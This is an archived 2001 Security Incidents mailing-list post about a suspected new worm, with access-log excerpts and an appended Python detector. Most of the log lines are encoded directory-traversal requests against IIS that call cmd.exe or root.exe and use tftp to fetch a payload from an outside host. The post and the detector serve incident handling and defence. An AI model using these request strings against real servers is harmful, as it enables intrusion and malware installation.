Security Incidents mailing list archives

New Worm Variant?


From: Aj Effin Reznor <aj () reznor com>
Date: Mon, 29 Oct 2001 23:19:32 -0800 (PST)


Anyone seen a new worm doing something like this?

Checking back through my logs, I haven't had a NIMDA instance yet looking
for httpodbc.dll.  Caught my eye.  Anyone else?  (Yes, some produce a
code 200 rather than 404, that's to be expected on this system).

Log times are in PST

[29/Oct/2001:17:08:22 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438 "-" "-"
[29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332 "-" "-"
[29/Oct/2001:17:08:44 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 384 "-" "-"
[29/Oct/2001:17:08:52 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 436 "-" "-"
[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"
[29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:21 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:30 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:30 -0800] "GET /c/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
[29/Oct/2001:17:09:40 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:09:52 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:01 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:11 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:11 -0800] "GET /d/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
[29/Oct/2001:17:10:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
[29/Oct/2001:17:10:30 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:10:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:10:47 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:10:55 -0800] "GET /scripts/..%255c../httpodbc.dll HTTP/1.0" 200 393 "-" "-"
[29/Oct/2001:17:11:03 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-"
[29/Oct/2001:17:11:12 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:21 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:30 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:39 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
[29/Oct/2001:17:11:48 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 431 "-" "-"
[29/Oct/2001:17:11:57 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:15 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:24 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
[29/Oct/2001:17:12:33 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 459 "-" "-"
[29/Oct/2001:17:12:43 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:12:55 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:13:04 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:13:13 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll HTTP/1.0" 200 442 "-" "-"
[29/Oct/2001:17:13:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:13:33 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:13:42 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:13:51 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
[29/Oct/2001:17:14:10 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:14:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:28 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:37 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:14:45 -0800] "GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:14:53 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:15:07 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:15:19 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:15:28 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 466 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:15:38 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:15:50 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 414 "-" "-"
[29/Oct/2001:17:15:59 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
[29/Oct/2001:17:16:08 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
[29/Oct/2001:17:16:17 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 469 "-" "-"
[29/Oct/2001:17:16:26 -0800] "GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0" 200 397 "-" "-"
[29/Oct/2001:17:16:37 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
[29/Oct/2001:17:16:46 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:16:55 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:17:04 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 465 "-" "-"
[29/Oct/2001:17:17:13 -0800] "GET /scripts/..%252f../httpodbc.dll HTTP/1.0" 200 393 "-" "-"



-aj.
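Editor's note (added example, not part of aj's post): the log above cycles through every IIS path-decoding trick of the day (double percent-encoding such as %255c and %25%35%63, the overlong UTF-8 %c0%af and %c1%9c, and the malformed %c1%1c) before calling cmd.exe or root.exe with a tftp fetch, so grepping for a single pattern misses most of it. The Python below normalises the request path the way a lenient decoder effectively did, then extracts the command, tftp server and file names from the query. The sample log is constructed from a handful of the entries above plus one benign request and one variant the server answered with 400; the lenient 2-byte UTF-8 decoder is an analyst's approximation for detection and deliberately accepts sequences the real server may have rejected.

```python
"""Normalise IIS-era encoded request paths and flag the root.exe/cmd.exe + tftp pattern."""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: a handful of entries from the log above plus one benign
# request, so every encoding variant seen in the post gets exercised.
SAMPLE_LOG = r'''
[29/Oct/2001:17:08:22 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 438 "-" "-"
[29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332 "-" "-"
[29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
[29/Oct/2001:17:12:33 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 459 "-" "-"
[29/Oct/2001:17:14:10 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:20:00 -0800] "GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"
'''

LINE_RE = re.compile(
    r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')
TFTP_RE = re.compile(
    r'\btftp\b(?:\s+-i)?\s+(?P<server>\d{1,3}(?:\.\d{1,3}){3})\s+get\s+'
    r'(?P<remote>\S+)(?:\s+(?P<local>\S+))?', re.I)
SHELLS = ('cmd.exe', 'root.exe')


def decode_iis_path(raw: str) -> str:
    """Two percent-decoding passes (catches %255c, %%35%63, %25%35%63, %252f),
    then a deliberately lenient 2-byte UTF-8 pass: the low six bits of the byte
    after a 0xC0-0xDF lead are taken without checking it is a continuation
    byte, which is what turns %c0%af into '/', and %c1%9c or %c1%1c into '\'.
    Approximation for detection only, not a faithful model of the server."""
    b = unquote_to_bytes(unquote_to_bytes(raw))
    out = bytearray()
    i = 0
    while i < len(b):
        c = b[i]
        if 0xC0 <= c <= 0xDF and i + 1 < len(b):
            cp = ((c & 0x1F) << 6) | (b[i + 1] & 0x3F)
            if cp < 0x80:            # overlong/malformed encoding of an ASCII byte
                out.append(cp)
                i += 2
                continue
        out.append(c)
        i += 1
    return out.decode('latin-1').replace('\\', '/').lower()


def analyse_request(uri: str) -> dict:
    """Classify one request URI; command fields are filled only for shell hits."""
    path, _, query = uri.partition('?')
    decoded = decode_iis_path(path)
    f = {
        'path': decoded,
        'encoded_traversal': '/../' in decoded and '/../' not in path,
        'shell': decoded.rsplit('/', 1)[-1] in SHELLS,
        'odbc_probe': decoded.endswith('/httpodbc.dll'),
        'command': None, 'tftp_server': None, 'remote_file': None, 'local_file': None,
    }
    if f['shell'] and query:
        # the query string is handed to the shell as its argv; '+' and %20 are both spaces
        cmd = unquote_to_bytes(query.replace('+', ' ')).decode('latin-1')
        f['command'] = re.sub(r'^/c\s+', '', cmd, flags=re.I).strip()
        m = TFTP_RE.search(f['command'])
        if m:
            f.update(tftp_server=m['server'], remote_file=m['remote'], local_file=m['local'])
    return f


def scan(log_text: str) -> list:
    """One finding per log line that is a shell call, an encoded traversal or an httpodbc.dll probe.
    Status is kept but not used as a filter: a 400 or 404 is still an attempt."""
    results = []
    for line in log_text.strip().splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        f = analyse_request(m['uri'])
        if f['shell'] or f['odbc_probe'] or f['encoded_traversal']:
            f.update(ts=m['ts'], status=int(m['status']))
            results.append(f)
    return results


def tftp_sources(findings) -> set:
    """Distinct hosts the attacker tried to pull a payload from (blocklist input)."""
    return {f['tftp_server'] for f in findings if f['tftp_server']}


if __name__ == '__main__':
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} {f['status']} {f['path']} cmd={f['command']!r} tftp={f['tftp_server']}")
    print('payload hosts:', sorted(tftp_sources(hits)))
```

Point the scan at a full access log and the tftp_server set is the list of hosts to block at the border and to report; the 'local_file' field shows the attacker writing httpodbc.dll next to cmd.exe or to the root of c:, d: and e:, which is what the follow-up GET /.../httpodbc.dll requests are testing for.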
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com